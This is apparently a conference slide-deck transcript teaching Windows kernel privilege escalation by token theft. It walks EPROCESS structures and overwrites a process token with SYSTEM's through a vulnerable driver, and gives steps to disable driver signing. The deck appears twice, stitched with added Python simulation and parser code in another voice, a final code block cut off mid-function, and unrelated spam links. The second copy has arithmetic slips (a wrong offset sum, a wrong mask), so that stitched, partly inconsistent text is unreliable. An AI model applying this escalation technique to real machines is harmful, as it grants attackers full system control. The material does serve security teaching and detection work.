Windows Privilege Escalation
Russell Sanford
xort @ sploit.online
A Low-Level Explanation of Token Theft
What We're Covering:
• KPRCB structure
• ETHREAD structure
• EPROCESS structures
• ActiveProcessLinks
• Locating SYSTEM’s EPROCESS structure from Userland
• Stealing SYSTEM's TOKEN and patching it over our
process' EPROCESS for Priv Esc
• Read / Write Primitives
Extra Fun - Interactive Learning Exploit!
• DHA_Vuln_Driver_RW_Primitive.sys
• DHA_Userland_Exploit_PEEKPOKE.exe
• DHA_Userland_Find_SYSTEM_EPROCESS.exe
• DHA_PrivEsc_Demo.py
Windows Privilege Escalation
Token Theft @ A Low-Level
WOOHOO!
Goals of this presentation
• Explain how Token Theft Privilege Escalation works
• Explain what Read-What-Where and Write-What-Where primitives are
• Provide you with a simplified vulnerable target driver and tool to exploit
the driver to practice with
• Walk through exploiting our demo kernel vulnerability
Before we start…
A quick note on pointers and memory addressing
What's this ‘pointer’ you speak of?
A pointer is a variable that stores the address of another variable.
It's an address stored at an address that points to somewhere else.
In the example above, the POINTER located at address 0x7fff98b499e8 POINTS to address 0x7fffa0757dd4 which
is where the Variable with the value “10” is located.
Setup : The Code
• I've provided compiled versions of the kernel driver, the executables used to exploit
it, and the scripted exploit. Compiled binaries and source code:
http://sploit.online/0x2_KernelTalks_TokenTheftPrivEsc/
• If you don’t trust the code – or just wish to analyze it – the source has been provided
as well.
• To compile the code, you will need Visual Studio as well as the Windows SDK and
WDK. Instructions for installing these prerequisites can all be found here:
https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk
Setup : Loading the DHA_VulnDriver with
OSR Driver Loader
1) Select BROWSE to select the Driver
2) Select Register Service
( All Windows drivers must have an entry in the
Registry in order to load )
3) Select Start Service
* ALTERNATIVELY, you could use an unsigned driver loader like KDU :D :D
SETUP: DISABLE DRIVER SIGNING
In order to load the vulnerable driver, you must first disable Driver Signature Enforcement!
1) Hold SHIFT and select Restart
2) Select Startup Settings
3) Select Restart
4) Press F7
Windows Internal Structures for Process Management
Windows Internals:
KPRCB structure
The name KPRCB stands for (Kernel) Processor Control Block.
The kernel keeps one for each logical processor as the last
member of the processor’s KPCR.
The KPRCB (formally _KPRCB) holds most of what the kernel
needs ready access to while managing a processor and while
managing resources that are themselves managed more simply
and quickly per processor.
The KPRCB structure’s CurrentThread pointer connects the
structure to a _ETHREAD structure….
Windows Internals:
ETHREAD structure
• The ETHREAD structure is the kernel’s
representation of a thread object.
• In the Windows Kernel it is accessed by
referencing GS:0x188
• When writing kernel shellcode, this is the easiest
entry point from which to work your way to the
linked list of EPROCESS structures
(figure: %gs:0x188 in assembly points to the current ETHREAD)
Windows Internals:
EPROCESS structures
• The EPROCESS structure is the kernel's representation
of a process object.
• Each running process has an associated
EPROCESS structure that Windows uses to
keep track of it.
A look inside an EPROCESS structure
• The actual structure is 2944 bytes in length and hosts
a vast amount of information describing the running
process, such as the process's name, the Image Base
Address of the loaded binary in memory, and a whole
lot more.
• For this exercise we'll only be using 3 fields of this
lengthy and detailed structure:
1) UniqueProcessId (PID)
2) ActiveProcessLinks (Links to the next/previous
EPROCESS structures)
3) Token (Security Token Assigned to process)
0:027> dt nt!_EPROCESS
ntdll!_EPROCESS
+0x000 Pcb : _KPROCESS
...
+0x440 UniqueProcessId : Ptr64 Void
+0x448 ActiveProcessLinks : _LIST_ENTRY
...
+0x4b8 Token : _EX_FAST_REF
...
...
+0x5a8 ImageFileName : [15] UChar
...
+0xb70 MitigationFlags3Values : <unnamed-tag>
0:024> ?? sizeof(nt!_EPROCESS)
unsigned int64 0xb80
Walking EPROCESS structures using ActiveProcessLinks
• Each EPROCESS structure contains a LIST_ENTRY substructure, a pair of
pointers, known as ActiveProcessLinks
• LIST_ENTRY structures form a doubly-linked list: each one points to the identical
structures immediately preceding and following the current structure
• ActiveProcessLinks (LIST_ENTRY links) allow us to walk through a list of all the
system's EPROCESS structures, each of which represents a running process,
in a circular manner, both forwards and backwards
Exploit Primitives
READ-WHAT-WHERE & WRITE-WHAT-WHERE Primitives
READ-WHAT-WHERE – allows us to specify an address to a function
and return the value stored at that location in memory
WRITE-WHAT-WHERE – allows us to specify an address in memory
along with a value to store at that location in memory
* These terms are typically used when referring to kernel land
vulnerabilities but also can be used in describing userland bugs
Data-Driven Attacks
Due to VBS, HVCI, CI, DEP, Page Guard, and other mitigations, the days of
running executable shellcode are largely over.
Data-driven attacks that modify a process' handles, structures, and
objects are still fair game.
We can utilize Data-Driven Attacks to Escalate Privileges and get executable
code to run (example: LOL Driver attacks)
Exploitation Tool
Keeping it old school - PEEK and POKE 
DHA_Userland_Exploit_PEEKPOKE.exe
Allows us to READ or WRITE R/W sections of memory by offering Read-What-Where and Write-What-Where primitives to conduct data-driven attacks against the kernel.
Usage:
PEEK [address]
POKE [address] [write-data]
Operates with UINT64 variables
The Vulnerable Driver
DHA_Vuln_Driver_RW_Primitive.sys
BSOD-free kernel fun !
• The vulnerable driver was compiled with exception handling so that illegal
memory access attempts are not allowed to crash the kernel.
• Normally, if you tried to access an unallocated, privately mapped, or
illegal address you would cause an exception leading to something like…
The Privilege Escalation Attack – Step by Step
Locating SYSTEM’s EPROCESS structure from Userland
DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++)
STEP 1: Finding Windows Kernel Base
• The EnumDeviceDrivers() function populates a list of the load addresses of loaded system modules
• The first entry [0] contains the load address of ntoskrnl.exe (the Windows kernel)
Locating SYSTEM’s EPROCESS structure from Userland
DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (c++)
STEP 2: Finding SYSTEM's EPROCESS structure offset
• We use LoadLibraryA() to load ntoskrnl.exe into our own process (normally used for DLLs, but .EXE, .SYS, and
.DLL share the same PE file format)
• We use GetProcAddress() to find the export PsInitialSystemProcess (the offset of the EPROCESS
pointer within the image)
( GetProcAddress() is normally used to look
up function addresses, but what it's
ACTUALLY doing is looking up EXPORT
names/addresses )
• We add KernelBase + the PsInitialSystemProcess offset together to get the address of the pointer to SYSTEM's EPROCESS in kernel memory
Locating SYSTEM’s EPROCESS structure from Userland
STEP 1 & 2: Finding SYSTEM's EPROCESS structure offset
Note: KERNELBASE + OFFSET == POINTER to SYSTEM EPROCESS Structure (#4)
STEP 3: Resolve the POINTER to SYSTEM's EPROCESS structure
Now we have the location of SYSTEM’s EPROCESS structure and have entered the
double-linked list of EPROCESS structures!
ADDRESS: 0xffff848b9eafd040
Let’s Verify we have SYSTEM’s EPROCESS structure
SYSTEM’s EPROCESS structure ALWAYS has a PID of #4
EPROCESS Structure offsets
UniqueProcessId = 0x440 # PVOID
ActiveProcessLinks = 0x448 # LIST_ENTRY
Token = 0x4b8 # PVOID
EPROCESS ADDRESS = 0xffff848b9eafd040
UniqueProcessId = 0x440
0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd480
YEP That’s SYSTEM!
Let’s steal SYSTEM’s EPROCESS structure’s security Token !
EPROCESS Structure offsets
UniqueProcessId = 0x440 # PVOID
ActiveProcessLinks = 0x448 # LIST_ENTRY
Token = 0x4b8 # PVOID
EPROCESS ADDRESS = 0xffff848b9eafd040
Token = 0x4b8
0xffff848b9eafd040 + 0x4b8 = 0xffff848b9eafd4f8
SYSTEM_TOKEN = 0xffffbe87f081e62f
Let’s adjust our recovered SYSTEM EPROCESS Token for use
All Windows internal OBJECTs have an attached 'Reference Count' (Ref Cnt) number that
tracks the different instances of use of an object.
We're going to remove the Reference Count from the Token for our purposes.
This simply means removing the lower 3 bits of our recovered token by using a logical
AND operation with the value 0xfffffffffffffff8
SYSTEM_TOKEN = 0xFFFFBE87F081E62F (BEFORE)
&
0xFFFFFFFFFFFFFFF8
=
SYSTEM_TOKEN = 0xFFFFBE87F081E628 (AFTER) * in this instance the lower nibble 0xF (1111) becomes 0x8 (1000)
Let's walk the EPROCESS list's connecting LIST_ENTRYs
Remember, each link in a LIST_ENTRY structure just points to the next link (Flink/Blink)
(figure: three consecutive Flink values from the list: 0xffff848b9eb90488 -> 0xffff848b9ebe2488 -> 0xffff848ba0fda488)
Let's walk the EPROCESS list's connecting LIST_ENTRYs to
find our process' PID
We add the ActiveProcessLinks offset of +0x448 to the address of SYSTEM's EPROCESS structure and dereference (PEEK) the address there to enter the doubly-linked list.
The LOOP:
We check (PEEK) the value at ADDRESS - 0x8 to see if it is equal to our PID.
If not: we (PEEK) the address returned by the last step to walk the list forward.
Once we find our PID, let's copy SYSTEM's Token over ours
Note: The difference between the UniqueProcessId offset and the Token offset is 0x78 bytes.
At this location we write our stolen Token using the POKE command, supplying the address of our PID's Token to write to and the SYSTEM Token value.
Demo Exploit Automating the Attack
Demo Exploit Module DHA_PrivEsc_Demo.py
Final Notes on Professional Exploitation
Final notes on writing Professional Exploits…
The EPROCESS structure is what's known as an "opaque structure", basically meaning
it's meant to be internal and its layout is subject to change.
The EPROCESS structure has changed many times in the last few versions of Windows.
Offset changes can be observed in the structure here:
https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm
In writing a professional exploit, an exploit author would detect the OS version and adjust
to ensure these offsets match the version of the target OS, so that the exploit could be
versatile if affecting multiple versions of the operating system
Final notes on writing Professional Exploits…
To keep some of the math basic, I explained to you that the PID could be found 8 bytes
behind ActiveProcessLinks' LIST_ENTRY structure when walking EPROCESS structures.
A more structured exploit would subtract the ActiveProcessLinks offset from
the ActiveProcessLinks location to find the actual beginning of the EPROCESS structure,
then use the offset values from the base of the structure.
This is the more elegant approach: it makes exploits easier to port to multiple versions
of an OS and uses offsets more recognizable to other researchers than our "this-8=PID"
style tricks.
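The list walk from the step-by-step section and the structure-base recovery recommended in these final notes, as one Python simulation added here (this is not the talk's DHA_PrivEsc_Demo.py or any of the author's tools). It models a handful of EPROCESS structures as constructed bytes in a fake memory that only exposes the talk's two primitives, PEEK and POKE, uses the offsets quoted on the slides (0x440, 0x448, 0x4b8, which are build-specific), walks ActiveProcessLinks by subtracting the link offset to get back to the structure base, and strips the _EX_FAST_REF count with the slides' mask. It then adds the defender-side view: after the overwrite the slides describe, two EPROCESS entries reference the same token object, which an integrity pass over the process list can flag. SYSTEM's address and token value are the ones shown on the slides; the other addresses, the PIDs 0x2bc and 0x1f40 and their token values are constructed.

```python
import struct

# EPROCESS field offsets as quoted on the slides. They are build-specific:
# the structure is opaque and its layout changes between Windows versions.
OFF_UNIQUE_PROCESS_ID = 0x440     # PVOID
OFF_ACTIVE_PROCESS_LINKS = 0x448  # LIST_ENTRY { Flink, Blink }
OFF_TOKEN = 0x4b8                 # _EX_FAST_REF
EX_FAST_REF_MASK = 0xFFFFFFFFFFFFFFF8  # the slides' mask: clear the low 3 ref-count bits


class FakeKernelMemory:
    """Sparse little-endian memory exposing only the talk's two primitives:
    peek (read-what-where) and poke (write-what-where) on UINT64 values."""

    def __init__(self):
        self.cells = {}

    def poke(self, addr, value):
        for i, b in enumerate(struct.pack("<Q", value)):
            self.cells[addr + i] = b

    def peek(self, addr):
        raw = bytes(self.cells.get(addr + i, 0) for i in range(8))
        return struct.unpack("<Q", raw)[0]


def build_process_list(mem, procs):
    """procs: [(eprocess_base, pid, token_with_refcount), ...]. Writes the three
    fields the slides use and links ActiveProcessLinks into a circular list."""
    n = len(procs)
    for i, (base, pid, token) in enumerate(procs):
        flink = procs[(i + 1) % n][0] + OFF_ACTIVE_PROCESS_LINKS
        blink = procs[(i - 1) % n][0] + OFF_ACTIVE_PROCESS_LINKS
        mem.poke(base + OFF_UNIQUE_PROCESS_ID, pid)
        mem.poke(base + OFF_ACTIVE_PROCESS_LINKS, flink)
        mem.poke(base + OFF_ACTIVE_PROCESS_LINKS + 8, blink)
        mem.poke(base + OFF_TOKEN, token)


def strip_refcount(ex_fast_ref):
    """_EX_FAST_REF -> object pointer: drop the embedded reference-count bits."""
    return ex_fast_ref & EX_FAST_REF_MASK


def walk_process_list(mem, system_eprocess):
    """Yield (eprocess_base, pid) for every entry reachable from SYSTEM's links.
    Recovers the structure base CONTAINING_RECORD-style (link - link offset)
    instead of the slides' 'link - 8 = PID' shortcut; both agree for these offsets."""
    head = system_eprocess + OFF_ACTIVE_PROCESS_LINKS
    link = head
    while True:
        base = link - OFF_ACTIVE_PROCESS_LINKS
        yield base, mem.peek(base + OFF_UNIQUE_PROCESS_ID)
        link = mem.peek(link)      # follow Flink
        if link == head:           # circular list: back where we started
            return


def find_eprocess_by_pid(mem, system_eprocess, pid):
    for base, cur_pid in walk_process_list(mem, system_eprocess):
        if cur_pid == pid:
            return base
    return None


def find_shared_tokens(mem, system_eprocess):
    """Integrity check: map token object address -> PIDs referencing it.
    A healthy list has one PID per token object; after token theft SYSTEM's
    token is referenced from two EPROCESS entries."""
    owners = {}
    for base, pid in walk_process_list(mem, system_eprocess):
        tok = strip_refcount(mem.peek(base + OFF_TOKEN))
        owners.setdefault(tok, []).append(pid)
    return {tok: pids for tok, pids in owners.items() if len(pids) > 1}


def simulate_token_overwrite(mem, system_eprocess, target_pid):
    """Replay, inside the fake memory only, the write the slides describe
    (SYSTEM's stripped token POKEd over the target's Token field)."""
    target = find_eprocess_by_pid(mem, system_eprocess, target_pid)
    if target is None:
        raise ValueError("pid not in list")
    system_token = strip_refcount(mem.peek(system_eprocess + OFF_TOKEN))
    mem.poke(target + OFF_TOKEN, system_token)
    return system_token


def demo():
    mem = FakeKernelMemory()
    system_eprocess = 0xFFFF848B9EAFD040  # SYSTEM EPROCESS address from the slides
    procs = [
        (system_eprocess,    4,      0xFFFFBE87F081E62F),  # SYSTEM; token value from the slides
        (0xFFFF848B9EB90040, 0x2BC,  0xFFFFBE87F0A1B0A3),  # constructed neighbour
        (0xFFFF848B9EBE2040, 0x1F40, 0xFFFFBE87F0C2D4E5),  # constructed "our" process
    ]
    build_process_list(mem, procs)
    before = find_shared_tokens(mem, system_eprocess)
    simulate_token_overwrite(mem, system_eprocess, 0x1F40)
    after = find_shared_tokens(mem, system_eprocess)
    return before, after


if __name__ == "__main__":
    print(demo())
```

Running the file prints an empty result for the clean list followed by the shared token pointer with the PIDs 4 and 0x1f40 once the overwrite has happened. That second result is what a memory-integrity pass over the real process list looks for: a non-SYSTEM process whose Token pointer resolves to the same _TOKEN object as PID 4.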
Next Talk: Exploiting LOLDriver Vulnerabilities
DC214 – 7.13.23
Thanks!
Russell Sanford
xort@sploit.online

 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Cloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStackCloud Management Software Platforms: OpenStack
Cloud Management Software Platforms: OpenStack
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 

0x002 - Windows Priv Esc - A Low Level Explanation of Token Theft

  • 1. Windows Privilege Escalation: A Low-Level Explanation of Token Theft – Russell Sanford, xort @ sploit.online
  • 2. What We're Covering:
    • KPRCB structure
    • ETHREAD structure
    • EPROCESS structures
    • ActiveProcessLinks
    • Locating SYSTEM’s EPROCESS structure from userland
    • Stealing SYSTEM’s TOKEN and patching it over our process’ EPROCESS for priv esc
    • Read / Write primitives
    Extra Fun - Interactive Learning Exploit!
    • DHA_Vuln_Driver_RW_Primitive.sys
    • DHA_Userland_Exploit_PEEKPOKE.exe
    • DHA_Userland_Find_SYSTEM_EPROCESS.exe
    • DHA_PrivEsc_Demo.py
    Windows Privilege Escalation: Token Theft @ A Low-Level. WOOHOO!
  • 3. Goals of this presentation
    • Explain how Token Theft privilege escalation works
    • Explain what Read-What-Where and Write-What-Where primitives are
    • Provide you with a simplified vulnerable target driver and a tool to exploit the driver, to practice with
    • Walk through exploiting our demo kernel vulnerability
  • 4. Before we start… A quick note on pointers and memory addressing
  • 5. What's this ‘pointer’ you speak of?
    A pointer is a variable that stores the address of another variable. It’s an address stored at an address that points to somewhere else. In the example above, the POINTER located at address 0x7fff98b499e8 POINTS to address 0x7fffa0757dd4, which is where the variable with the value “10” is located.
  • 6. Setup : The Code
  • 7. Setup : The Code
    • I’ve provided compiled versions of the kernel driver, the executables used to exploit it, and the scripted exploit. Compiled binaries and source code: http://sploit.online/0x2_KernelTalks_TokenTheftPrivEsc/
    • If you don’t trust the code – or just wish to analyze it – the source has been provided as well.
    • To compile the code, you will need Visual Studio as well as the Windows SDK and WDK. Instructions for installing these prerequisites can all be found here: https://learn.microsoft.com/en-us/windows-hardware/drivers/download-the-wdk
  • 8. Setup : Loading the DHA_VulnDriver with OSR Driver Loader
    1) Select BROWSE to select the driver
    2) Select Register Service (all Windows drivers must have an entry in the registry in order to load)
    3) Select Start Service
    * ALTERNATIVELY, you could use an unsigned driver loader like KDU :D :D
  • 9. SETUP: DISABLE DRIVER SIGNING
    In order to load the vulnerable driver, you must first disable Driver Signature Enforcement!
    (Screenshot callouts 1–4: + SHIFT, Press F7, Select Startup Settings, Select Restart)
  • 10. Windows Internal Structures for Process Management
  • 11. Windows Internals: KPRCB structure
    The name KPRCB stands for (Kernel) Processor Control Block. The kernel keeps one for each logical processor as the last member of the processor’s KPCR. The KPRCB (formally _KPRCB) holds most of what the kernel needs ready access to while managing a processor, and while managing resources that are themselves managed more simply and quickly per processor. The KPRCB structure’s CurrentThread pointer connects the structure to an _ETHREAD structure…
  • 12. Windows Internals: ETHREAD structure
    • The ETHREAD structure is the kernel’s representation of a thread object.
    • In the Windows kernel it is accessed by referencing GS:0x188
    • When writing kernel shellcode, this is the easiest entry point path to work your way to the EPROCESS list of linked structures
    (Screenshot callout: <----- %gs:0x188 in assembly points here)
  • 13. Windows Internals: EPROCESS structures
    • The EPROCESS structure is the kernel's representation of a process object.
    • Each running process has an associated EPROCESS structure that Windows uses to keep track of it.
  • 14. A look inside an EPROCESS structure
    • The actual structure is 2944 bytes in length and hosts a vast amount of information describing the running process, such as the process’s name, the image base address of the loaded binary in memory, and a whole lot more.
    • For this exercise we’ll only be using 3 fields of this lengthy and detailed structure:
      1) UniqueProcessId (PID)
      2) ActiveProcessLinks (links to the next/previous EPROCESS structures)
      3) Token (security token assigned to the process)
    0:027> dt nt!_EPROCESS
    ntdll!_EPROCESS
       +0x000 Pcb : _KPROCESS
       ...
       +0x440 UniqueProcessId : Ptr64 Void
       +0x448 ActiveProcessLinks : _LIST_ENTRY
       ...
       +0x4b8 Token : _EX_FAST_REF
       ...
       ...
       +0x5a8 ImageFileName : [15] UChar
       ...
       +0xb70 MitigationFlags3Values : <unnamed-tag>
    0:024> ?? sizeof(nt!_EPROCESS)
    unsigned int64 0xb80
  • 15. Walking EPROCESS structures using ActiveProcessLinks
    • Each EPROCESS structure contains a LIST_ENTRY substructure, a pair of pointers, known as ActiveProcessLinks
    • LIST_ENTRY structures form a doubly linked list that points to identical structures both preceding and following the current structure
  • 16. Walking EPROCESS structures using ActiveProcessLinks
    • ActiveProcessLinks (LIST_ENTRY links) allow us to walk through a list of all the system’s EPROCESS structures – each representing a running process – in a circular manner, both forwards and backwards
  • 17. Exploit Primitives
  • 18. READ-WHAT-WHERE & WRITE-WHAT-WHERE Primitives
    READ-WHAT-WHERE – allows us to specify an address to a function and return the value stored at that location in memory
    WRITE-WHAT-WHERE – allows us to specify an address in memory along with a value to store at that location in memory
    * These terms are typically used when referring to kernel-land vulnerabilities, but can also be used to describe userland bugs
  • 19. Data-Driven Attacks
    Due to VBS, HVCI, CI, DEP, Page Guard, and other mitigations, the days of running executable shellcode are largely over, while data-driven attacks involving modifying a process’ handles, structures, and objects are still fair game. We can utilize data-driven attacks to escalate privileges and get executable code to run (example: LOL driver attacks)
  • 20. Exploitation Tool
  • 21. Keeping it old school - PEEK and POKE
  • 22. DHA_Userland_Exploit_PEEKPOKE.exe
    Allows us to READ or WRITE to R/W sections of memory by offering Read-What-Where and Write-What-Where primitives to conduct data-driven attacks against the kernel.
    Usage: PEEK [address]
           POKE [address] [write-data]
    Operates with UINT64 variables
  • 23. The Vulnerable Driver
  • 24. DHA_Vuln_Driver_RW_Primitive.sys – BSOD-free kernel fun!
    • The vulnerable driver was compiled with exception handling so that illegal memory access attempts are not allowed to crash the system.
    • Normally, if you tried to access an unallocated, privately mapped, or illegal address you would cause an exception leading to something like…
  • 25. The Privilege Escalation Attack – Step by Step
  • 26. Locating SYSTEM’s EPROCESS structure from Userland
    DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (C++)
    STEP 1: Finding the Windows kernel base
    • The EnumDeviceDrivers() function will populate a list of loaded system modules
    • The first entry [0] contains the load address of ntoskrnl.exe (the Windows kernel)
  • 27. Locating SYSTEM’s EPROCESS structure from Userland
    DHA_Userland_Find_SYSTEM_EPROCESS.exe explained… (C++)
    STEP 2: Finding SYSTEM’s EPROCESS structure offset
    • We use LoadLibraryA() to load ntoskrnl.exe (normally used for DLLs – but .EXE, .SYS, and .DLL all share the same PE file format)
    • We use GetProcAddress() to find the export for PsInitialSystemProcess (EPROCESS pointer offset). (GetProcAddress() is normally used to look up function addresses – but what it’s ACTUALLY doing is looking up EXPORT names/addresses.)
    • We add the kernel base + the PsInitialSystemProcess offset together for the pointer to the EPROCESS in memory
  • 28. Locating SYSTEM’s EPROCESS structure from Userland
    STEP 1 & 2: Finding SYSTEM’s EPROCESS structure offset
    Note: KERNELBASE + OFFSET == POINTER to SYSTEM EPROCESS structure (#4)
    STEP 3: Resolve the POINTER to SYSTEM’s EPROCESS structure
    Now we have the location of SYSTEM’s EPROCESS structure and have entered the doubly linked list of EPROCESS structures! ADDRESS: 0xffff848b9eafd040
  • 29. Let’s verify we have SYSTEM’s EPROCESS structure
    SYSTEM’s EPROCESS structure ALWAYS has a PID of #4
    EPROCESS structure offsets:
      UniqueProcessId = 0x440 # PVOID
      ActiveProcessLinks = 0x448 # LIST_ENTRY
      Token = 0x4b8 # PVOID
    EPROCESS ADDRESS = 0xffff848b9eafd040
    UniqueProcessId = 0x440
    0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd480
    YEP, that’s SYSTEM!
  • 30. Let’s steal SYSTEM’s EPROCESS structure’s security Token!
    EPROCESS structure offsets:
      UniqueProcessId = 0x440 # PVOID
      ActiveProcessLinks = 0x448 # LIST_ENTRY
      Token = 0x4b8 # PVOID
    EPROCESS ADDRESS = 0xffff848b9eafd040
    Token = 0x4b8
    0xffff848b9eafd040 + 0x440 = 0xffff848b9eafd4f8
    SYSTEM_TOKEN = 0xffffbe87f081e62f
  • 31. Let’s adjust our recovered SYSTEM EPROCESS Token for use
    All Windows internal OBJECTs have an attached ‘Reference Count’ (Ref Cnt) number to keep track of the different instances of use of an object. We’re going to remove the reference count from the Token for our purposes. This simply means removing the lower 3 bits of our recovered token by using a logical AND operation with the value 0xfffffffffffffff8
    SYSTEM_TOKEN = 0xFFFFBE87F081E62F (BEFORE)
    & 0xFFFFFFFFFFFFFFF7 =
    SYSTEM_TOKEN = 0xFFFFBE87F081E628 (AFTER)
    * in this instance the lower 0xF (1111) becomes 0x8 (1000)
  • 32. Let’s walk the EPROCESS list’s connecting LIST_ENTRYs
    Remember, each link in a LIST_ENTRY structure just points to the next link (Flink/Blink)
    (Addresses from the screenshot: 0xffff848b9eb90488, 0xffff848b9ebe2488, 0xffff848ba0fda488)
  • 33. Let’s walk the EPROCESS list’s connecting LIST_ENTRYs to find our process’ PID
    We add the ActiveProcessLinks offset of +0x448 to the address of SYSTEM’s EPROCESS structure and dereference (PEEK) the address there to enter the doubly linked list.
    The LOOP: We check (PEEK) the value at ADDRESS – 0x8 to see if it is equal to our PID. If not, we (PEEK) the last address returned to walk the list forward.
  • 34. Once we find our PID, let’s copy SYSTEM’s Token over ours
    Note: The difference between the UniqueProcessId offset and the Token offset is 0x78 bytes
    At this location we write our stolen Token using the POKE command, supplying the address of our PID’s Token to write to and the SYSTEM Token value
  • 35. Demo Exploit – Automating the Attack
  • 36. Demo Exploit Module: DHA_PrivEsc_Demo.py
  • 37. (screenshot only)
  • 38. Final Notes on Professional Exploitation
  • 39. Final notes on writing professional exploits…
    The EPROCESS structure is what’s known as an “opaque structure”, basically meaning it’s meant to be internal and its layout is subject to change. The EPROCESS structure has changed many times in the last few versions of Windows. Offset changes can be observed in the structure here: https://www.geoffchappell.com/studies/windows/km/ntoskrnl/inc/ntos/ps/eprocess/index.htm
    In writing a professional exploit, an exploit author would detect the OS version and adjust to ensure these offsets match the version of the target OS, so that the exploit could be versatile if affecting multiple versions of the operating system.
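As an added example (my code, not the deck's or any of its DHA_* tools), here is a parser for the WinDbg `dt nt!_EPROCESS` listing format shown on slide 14. Pulling the three offsets out of a symbol dump for the target build, and checking that each field carries the type you expect, is what a version-aware tool does instead of hard-coding 0x440/0x448/0x4b8; memory-forensics scanners that walk the same list resolve their offsets the same way. The sample listing is the one on slide 14, reconstructed with the `...` gaps the slide shows; the function and constant names are mine.

```python
import re

# Matches one field line of a WinDbg "dt" listing, e.g.
#   +0x440 UniqueProcessId  : Ptr64 Void
DT_FIELD = re.compile(r"^\s*\+0x([0-9a-fA-F]+)\s+(\w+)\s*:\s*(.+?)\s*$")

# Fields the ActiveProcessLinks walk needs, with the type each should show in the listing.
REQUIRED_FIELDS = {
    "UniqueProcessId": "Ptr64 Void",
    "ActiveProcessLinks": "_LIST_ENTRY",
    "Token": "_EX_FAST_REF",
}

# Constructed sample: the slide-14 listing, including the "..." gaps the slide shows.
SAMPLE_DT_OUTPUT = """\
0:027> dt nt!_EPROCESS
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   ...
   +0x440 UniqueProcessId  : Ptr64 Void
   +0x448 ActiveProcessLinks : _LIST_ENTRY
   ...
   +0x4b8 Token            : _EX_FAST_REF
   ...
   +0x5a8 ImageFileName    : [15] UChar
   ...
   +0xb70 MitigationFlags3Values : <unnamed-tag>
"""


def parse_dt_listing(text):
    """Return {field_name: (offset, type_string)} for every "+0x... name : type" line.
    Prompt lines, the struct name line and "..." gaps do not match and are skipped."""
    fields = {}
    for line in text.splitlines():
        m = DT_FIELD.match(line)
        if m:
            fields[m.group(2)] = (int(m.group(1), 16), m.group(3))
    return fields


def eprocess_offsets(text):
    """Pick out the three offsets the walk needs, refusing a listing that is missing a
    field or shows it with an unexpected type (a sign the dump is for the wrong struct
    or was pasted incompletely)."""
    fields = parse_dt_listing(text)
    offsets = {}
    for name, expected_type in REQUIRED_FIELDS.items():
        if name not in fields:
            raise KeyError(f"{name} not present in listing")
        offset, type_str = fields[name]
        if type_str != expected_type:
            raise ValueError(f"{name} has type {type_str!r}, expected {expected_type!r}")
        offsets[name] = offset
    return offsets


def pid_to_token_distance(offsets):
    """The slide-34 note: how many bytes the Token field sits past UniqueProcessId."""
    return offsets["Token"] - offsets["UniqueProcessId"]
```

Feed it the listing captured from the build you are targeting (or analysing) and use the returned dictionary in place of literal offsets; the type check is what catches a dump taken from a different structure or a truncated paste before a wrong offset reaches a kernel read.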
  • 40. Final notes on writing professional exploits…
    To keep some of the math basic I explained to you that the PID could be found 8 bytes behind ActiveProcessLinks’ LIST_ENTRY structure when walking EPROCESS structures. A more structured exploit would have deducted the length of ActiveProcessLinks from the ActiveProcessLinks location to find the actual beginning of the EPROCESS structure, then used the offset values from the base of the structure. This is the more elegant approach; it makes exploits easier to port to multiple versions of an OS and uses offsets more recognizable to other researchers vs. our this-8=PID styled tricks.
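The step-by-step walk from slides 26 through 34, written up as an added Python example that is not part of the deck or its DHA_* tools. Kernel memory is a constructed byte buffer with PEEK/POKE-style access standing in for the driver; the EPROCESS offsets and the sample token values are the ones on the slides, while the memory layout, the fake `PsInitialSystemProcess` cell and all helper names are assumptions. The walk recovers each EPROCESS base by subtracting the ActiveProcessLinks offset (0x448) from the Flink, the base-relative approach slide 40 recommends, and masks the _EX_FAST_REF with 0xfffffffffffffff8 as slide 31's text describes, which clears the low three bits so 0x...62F becomes 0x...628 (the AND line on slide 31 shows 0x...F7, which would leave bit 3 set). The last function is the defender-side check that follows from the technique: after a token swap, a non-SYSTEM EPROCESS carries the same Token object pointer as SYSTEM's, so the demo constructs that state and flags it rather than performing the POKE.

```python
import struct

# EPROCESS field offsets as the slides show them (the x64 build used in the deck).
OFF_UNIQUE_PROCESS_ID = 0x440
OFF_ACTIVE_PROCESS_LINKS = 0x448
OFF_TOKEN = 0x4b8
OFF_IMAGE_FILE_NAME = 0x5a8
EX_FAST_REF_MASK = 0xfffffffffffffff8   # clears the 3 low reference-count bits

# Constructed layout of the fake kernel memory; none of these are real addresses.
MEM_BASE = 0xffff848b9ea00000
MEM_SIZE = 0x10000
PS_INITIAL_SYSTEM_PROCESS = MEM_BASE + 0x100   # stands in for the resolved export: holds a pointer
FIRST_EPROCESS = MEM_BASE + 0x1000
EPROCESS_STRIDE = 0x1000


class FakeKernelMemory:
    """Flat byte buffer standing in for kernel memory, with PEEK/POKE-style 64-bit access.
    Out-of-range accesses raise instead of faulting, like the deck's exception-wrapped driver."""

    def __init__(self):
        self.buf = bytearray(MEM_SIZE)

    def _check(self, addr, size):
        if addr < MEM_BASE or addr + size > MEM_BASE + MEM_SIZE:
            raise ValueError(f"illegal address {addr:#x}")

    def peek(self, addr):
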